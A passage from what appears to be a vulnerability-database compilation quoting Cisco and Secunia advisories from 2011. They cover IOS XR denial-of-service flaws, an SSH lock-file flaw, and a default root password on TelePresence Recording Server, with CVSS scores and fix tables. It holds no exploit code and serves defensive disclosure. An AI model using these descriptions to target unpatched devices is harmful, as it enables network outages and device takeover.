RP/0/4/CPU0:Example#LC/0/1/CPU0:Apr 26 17:16:31.745 : tx_xbma[85]:
%L2-E5EGRESSQ-4-INTERRUPT : WIM error: reg 0x200000
This vulnerability is documented in Cisco bug ID CSCto45095 (
registered customers only) and has been assigned Common
Vulnerabilities and Exposures (CVE) ID CVE-2011-1651.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* Cisco XR 12000 Series SPA Interface Processor Vulnerability
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability may result in a
reloading of the SPA interface processor. Repeated exploitation could
result in a sustained denial of service (DoS) condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult:
http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a
complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+--------------------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | |
|----------+---------------------------------------------------|
| Affected | | | First |
| 3.2.X | SMU ID | SMU NAME | Fixed |
| through | | | Release |
|3.8.X |---------------------------------------------------|
| Based | There are no affected 3.2.X through 3.8.X based |
| Releases | releases |
|----------+---------------------------------------------------|
| Affected | | | First |
| 3.9.X | SMU ID | SMU NAME | Fixed |
| Based | | | Release |
| Releases | | | |
|----------+---------+------------------------------+----------|
| | | | No first |
| | | | fixed |
| | | | release; |
| 3.9.0 | None | No SMU available; Contact | Migrate |
| | | your Support Organization | to |
| | | | 4.0.3, |
| | | | 4.1.1 or |
| | | | later. |
|----------+---------+------------------------------+----------|
| | | | No first |
| | | | fixed |
| | | | release; |
| 3.9.1 | AA04896 | c12k-os-mbi-3.9.1.CSCto45095 | Migrate |
| | | | to |
| | | | 4.0.3, |
| | | | 4.1.1 or |
| | | | later. |
|----------+---------+------------------------------+----------|
| | | | No first |
| | | | fixed |
| | | | release; |
| 3.9.2 | AA04907 | c12k-os-mbi-3.9.2.CSCto45095 | Migrate |
| | | | to |
| | | | 4.0.3, |
| | | | 4.1.1 or |
| | | | later. |
|----------+---------+------------------------------+----------|
| Affected | | | First |
| 4.0.x | SMU ID | SMU NAME | Fixed |
| Based | | | Release |
| Releases | | | |
|----------+---------+------------------------------+----------|
| 4.0.0 | None | No SMU available; Contact | 4.0.3 |
| | | your Support Organization | |
|----------+---------+------------------------------+----------|
| 4.0.1 | AA04884 | c12k-4.0.1.CSCto45095 | 4.0.3 |
|----------+---------------------------------------------------|
| 4.0.3 | Not Affected |
|----------+---------------------------------------------------|
| Affected | | | First |
| 4.1.x | SMU ID | SMU NAME | Fixed |
| Based | | | Release |
| Releases | | | |
|----------+---------+------------------------------+----------|
| 4.1.0 | None | No SMU available; Contact | 4.1.1 |
| | | your Support Organization | |
|----------+---------------------------------------------------|
| 4.1.1 | Not Affected |
+--------------------------------------------------------------+
Workarounds
There are no workarounds for this vulnerability.
Using Infrastructure Access Control Lists (iACLs) may help limit the
attack surface of this vulnerability. Although it is often difficult
to block traffic that transits a network, it is possible to identify
traffic that should never be allowed to target infrastructure devices
and block that traffic at the border of networks. As a network
security best practice, iACLs should be considered a long-term
addition to good network security. Because some of the packets used
in this vulnerability could utilize UDP as a transport, it could be
possible to spoof the sender's IP address, which may defeat ACLs that
permit communication to these ports from trusted IP addresses.
Unicast RPF should be considered to be used in conjunction to offer a
better mitigation solution.
For more information on iACLs, consult the document "Limit Network
Access with Access Control Lists" at the following location:
http://www.cisco.com/web/about/security/intelligence/CiscoIOSXR.html#19
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was discovered when handling customer support
calls.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxrspa.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-May-25 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iFcDBQFN3RrPQXnnBKKRMNARCIkEAP9sE4FjJ6/IyOGqzNxOBcg3q+u3kGcjazdc
ln2xYeCyVgD/cRgImB/vxfJGe90DmEryeSmG61J/v4LcMM4RTUF6G/0=
=71Y8
-----END PGP SIGNATURE-----
| VAR-201105-0054 | CVE-2011-0943 | Cisco IOS XR NetIO Process Remote Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS XR 3.8.3, 3.8.4, and 3.9.1 allows remote attackers to cause a denial of service (NetIO process restart or device reload) via a crafted IPv4 packet, aka Bug ID CSCth44147.
An attacker can exploit this issue to cause a denial-of-service condition.
This issue is being tracked by Cisco Bug ID CSCth44147. A remote attacker could exploit this vulnerability to crash the application and deny service to legitimate users. ----------------------------------------------------------------------
Alerts when vulnerabilities pose a threat to your infrastructure
The enhanced reporting module of the Secunia Vulnerability Intelligence Manager (VIM) enables you to combine advisory and ticket information, and generate policy compliance statistics. Using your asset list preferences, customised notifications are issued as soon as a new vulnerability is discovered - a valuable tool for documenting mitigation strategies.
Watch our quick solution overview:
http://www.youtube.com/user/Secunia#p/a/u/0/M1Y9sJqR2SY
----------------------------------------------------------------------
TITLE:
Cisco IOS XR Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA44725
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44725/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44725
RELEASE DATE:
2011-05-26
DISCUSS ADVISORY:
http://secunia.com/advisories/44725/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44725/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44725
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco IOS XR, which can be
exploited by malicious people to cause a DoS (Denial of Service).
2) An error in the SSH server when handling an SSHv1 connection does
not delete sshd_lock files in the /tmp directory. This can be
exploited to consume all available disk space in the /tmp filesystem
and cause a crash.
3) An unspecified error when processing IPv4 packets can be exploited
to reload the SPA (Shared Port Adapters) Interface Processor.
Successful exploitation of this vulnerability requires that an IPv4
address is configured on any of the SPA interface processor
interfaces.
Please see the vendor's advisory for the list of affected products
and versions.
SOLUTION:
Apply updates. Please see the vendor's advisory for more information.
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) The vendor credits a customer.
3) Reported by the vendor.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr-ssh.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxrspa.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Successful exploitation could cause the NetIO process to restart.
Under a sustained attack, the Cisco CRS Modular Services Card (MSC)
on a Cisco Carrier Routing System (CRS) or a Line Card on a Cisco
12000 Series Router or Cisco ASR 9000 Series Aggregation Services
Router will reload.
Cisco has released free Software Maintenance Units (SMU) that address
this vulnerability.
There are no workarounds for this vulnerability.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml
Affected Products
=================
This vulnerability affects any device that is running Cisco IOS XR
Software Releases 3.8.3, 3.8.4, or 3.9.1 and has an IPv4 address
configured on one of the interfaces of a Cisco Line Card or Cisco CRS
MSC.
Vulnerable Products
+------------------
Cisco IOS XR Software Releases 3.8.3, 3.8.4, and 3.9.1 are affected
when they are running on the following Cisco hardware platforms:
* Cisco ASR 9000 Series Aggregation Services Routers
* Cisco Carrier Routing System
* Cisco XR 12000 Series Routers
To determine the Cisco IOS XR Software release that is running on a
Cisco product, administrators can log in to the device and issue the
show version command to display the system banner. The software
version is displayed after the text "Cisco IOS XR Software".
The following example identifies a Cisco XR 12000 Series Router that
is running Cisco IOS XR Software Release 3.9.1:
RP/0/0/CPU0:example#show version
Wed Dec 15 10:16:47.117 singa
Cisco IOS XR Software, Version 3.9.1[00]
Copyright (c) 2010 by Cisco Systems, Inc.
ROM: System Bootstrap, Version 12.0(20090302:133850) [rtauro-sw30346-33S 1.23dev(0.36)] DEVELOPMENT SOFTWARE
Copyright (c) 1994-2009 by cisco Systems, Inc.
example uptime is 26 minutes
System image file is "disk0:c12k-os-mbi-3.9.1/mbiprp-rp.vm"
cisco 12404/PRP (7457) processor with 3145728K bytes of memory.
7457 processor at 1266Mhz, Revision 1.2
1 Cisco 12000 Series Performance Route Processor
1 Cisco 12000 Series SPA Interface Processor-601/501/401
1 Cisco 12000 4 Port Gigabit Ethernet Controller (4 GigabitEthernet)
3 Management Ethernet
5 PLIM_QOS
8 FastEthernet
4 GigabitEthernet/IEEE 802.3 interface(s)
1019k bytes of non-volatile configuration memory.
982304k bytes of disk0: (Sector size 512 bytes).
62420k bytes of disk1: (Sector size 512 bytes).
65536k bytes of Flash internal SIMM (Sector size 256k).
The following products are not affected by this vulnerability:
* Cisco IOS Software
* Cisco IOS XE Software for Cisco ASR 1000 Series Routers
* Cisco NX-OS Software
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
Cisco IOS XR Software, which is part of the Cisco IOS Software
family, uses a microkernel-based distributed operating system
infrastructure. Cisco IOS XR Software runs on the Cisco CRS, Cisco
12000 Series Routers, and Cisco ASR 9000 Series Aggregation Services
Routers.
When a Cisco Line Card or Cisco CRS MSC sends a specific IPv4 packet,
the NetIO process will restart.
Although a crash is caused by a packet that originates from the Cisco
Line Card or Cisco CRS MSC, an unauthenticated, remote user can
trigger the vulnerability by sending specific IP packets to or
through the device. In the latter scenario, the Cisco Line Card or
Cisco CRS MSC will create the specific IPv4 packet response that
triggers the vulnerability
This vulnerability is documented in Cisco bug ID CSCth44147 (
registered customers only) and has been assigned CVE ID
CVE-2011-0943.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCth44147: NetIO Process crashes when generating specific IP packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability may result in a reload
of the Cisco CRS MSC on a Cisco CRS or the line cards on a Cisco
12000 Series Router or Cisco ASR 9000 Series Aggregation Services
Router. Repeated exploitation could result in a sustained DoS
condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult:
http://www.cisco.com/go/psirt and any subsequent advisories
to determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+------------------------------------------------------------------+
| Major | Availability of Repaired Releases | |
| Release | | |
|-----------+---------------------------------------------------+--|
| Affected | | | | |
| 3.2.X | | | First | |
| through | SMU ID | SMU NAME | Fixed | |
| 3.7.X - | | | Release | |
| Based | | | | |
| Releases | | | | |
|---------------------------------------------------------------+--|
| There are no affected 3.2.X through 3.7.X - based releases | |
|---------------------------------------------------------------+--|
| Affected | | | First | |
| 3.8.X | SMU ID | SMU NAME | Fixed | |
| Based | | | Release | |
| Releases | | | | |
|-----------+------------------------------------------------------|
| 3.8.0 | Not Vulnerable. |
|-----------+------------------------------------------------------|
| 3.8.1 | Not Vulnerable. |
|-----------+------------------------------------------------------|
| 3.8.2 | Not Vulnerable. |
|-----------+------------------------------------------------------|
| | CRS: | | No first | |
| | AA04566 | hfr-base-3.8.3.CSCth44147 | fixed | |
| | | | release; | |
| |----------+-----------------------------|migrate |--|
| 3.8.3 | ASR9K | Not Applicable | to | |
| | | | 3.9.X, | |
| |----------+-----------------------------|4.0.X, |--|
| | XR12000 | Not Applicable | or | |
| | | | later. | |
|-----------+----------+-----------------------------+----------+--|
| | CRS: | | No first | |
| | AA04565 | hfr-base-3.8.4.CSCth44147 | fixed | |
| | | | release; | |
| |----------+-----------------------------|migrate |--|
| 3.8.4 | ASR9K | Not Applicable | to | |
| | | | 3.9.2, | |
| |----------+-----------------------------|4.X.0, |--|
| | XR12000: | | or | |
| | AA04567 | c12k-base-3.8.4.CSCth44147 | later. | |
| | | | | |
|-----------+----------+-----------------------------+----------+--|
| Affected | | | First | |
| 3.9.X | SMU ID | SMU NAME | Fixed | |
| Based | | | Release | |
| Releases | | | | |
|-----------+------------------------------------------------------|
| 3.9.0 | Not Vulnerable. |
|-----------+------------------------------------------------------|
| | CRS: | hfr-base-3.9.1.CSCth44147 | | |
| | AA04564 | | | |
| |----------+-----------------------------| |--|
| 3.9.1 | ASR9K: | asr9k-base-3.9.1.CSCth44147 | 3.9.2 | |
| | AA04563 | | | |
| |----------+-----------------------------| |--|
| | XR12000: | c12k-base-3.9.1.CSCth44147 | | |
| | AA04530 | | | |
|-----------+------------------------------------------------------|
| 3.9.2 | Not Vulnerable. |
|-----------+------------------------------------------------------|
| Affected | | |
| 4.0.X - | There are no affected 4.0.X - based releases | |
| based | | |
| Releases. | | |
|-----------+---------------------------------------------------+--|
| Affected | | |
| 4.1.X | There are no affected 4.1.X based releases. | |
| Based | | |
| Releases | | |
+------------------------------------------------------------------+
Workarounds
===========
There are no workarounds for this vulnerability.
Using Infrastructure Access Control Lists (iACLs) may help limit the
attack surface of this vulnerability. Although it is often difficult
to block traffic that transits a network, it is possible to identify
traffic that should never be allowed to target infrastructure devices
and block that traffic at the border of networks. iACLs are a network
security best practice and should be considered as a long-term
addition to good network security. Because some packets that may be
used to exploit this vulnerability could utilize UDP as a transport,
an attacker could spoof the sender's IP address, which may defeat
ACLs that permit communication to these ports from trusted IP
addresses. To provide a better mitigation solution, administrators
should consider using Unicast Reverse Path Forwarding (Unicast RPF)
in conjunction with iACLs.
For more information on iACLs, consult the document "Limit Network
Access with Access Control Lists" at the following link:
http://www.cisco.com/web/about/security/intelligence/CiscoIOSXR.html#19
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was discovered during the handling of customer
support calls.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-May-25 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iFcDBQFN3RqIQXnnBKKRMNARCFVnAP9055GGNzOdS4o6ca7nIpjU4jWY2930jsGp
iuPOrCybNAD+LFjrUG0Lgx2J2zerdps17lMTixKZyRyrUn9r5lM9G6k=
=dXMx
-----END PGP SIGNATURE-----
| VAR-201108-0097 | CVE-2011-2555 | Cisco TelePresence Recording Server Vulnerabilities whose settings are changed |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco TelePresence Recording Server 1.7.2.x before 1.7.2.1 has a default password for the root administrator account, which makes it easier for remote attackers to modify the configuration via an SSH session, aka Bug ID CSCtr76182. The problem is Bug ID CSCtr76182 It is a problem.By a third party SSH The settings may be changed through the session. Cisco TelePresence is a telepresence conferencing solution developed by Cisco.
An attacker can exploit this issue to gain unauthorized administrative access to the affected device. Successful exploits will result in the complete compromise of the affected device.
This issue is being tracked by Cisco bug ID CSCtr76182.
A workaround exists to mitigate this vulnerability.
Cisco has released free software updates that address this
vulnerability.
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
The Cisco TelePresence solution allows an immersive, in-person
communication and collaboration over the network with colleagues,
prospects, and partners, even when they are located in opposite
hemispheres.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCtr76182 - Root account enabled with default password
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of this vulnerability could allow a remote
attacker to use these default credentials to modify the system
configuration and settings.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Workarounds
===========
A workaround exists to mitigate and fix this vulnerability. The
workaround requires manual intervention on the affected system.
Please contact the Cisco Technical Assistance Center (TAC) for
instructions on how to implement this workaround.
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Intelligence companion
document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20110729-tp.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
================================
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers without Service Contracts
===================================
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
Potential exploitation was reported directly to Cisco by a single
customer. The PSIRT is not aware of any widespread exploitation or
public announcements of this vulnerability.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110729-tp.shtml
In addition to worldwide web posting, a text version of this notice
